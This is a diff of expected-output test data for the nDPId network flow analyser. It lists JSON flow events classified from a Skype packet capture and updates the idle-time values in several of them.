00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1121,34 +1121,34 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
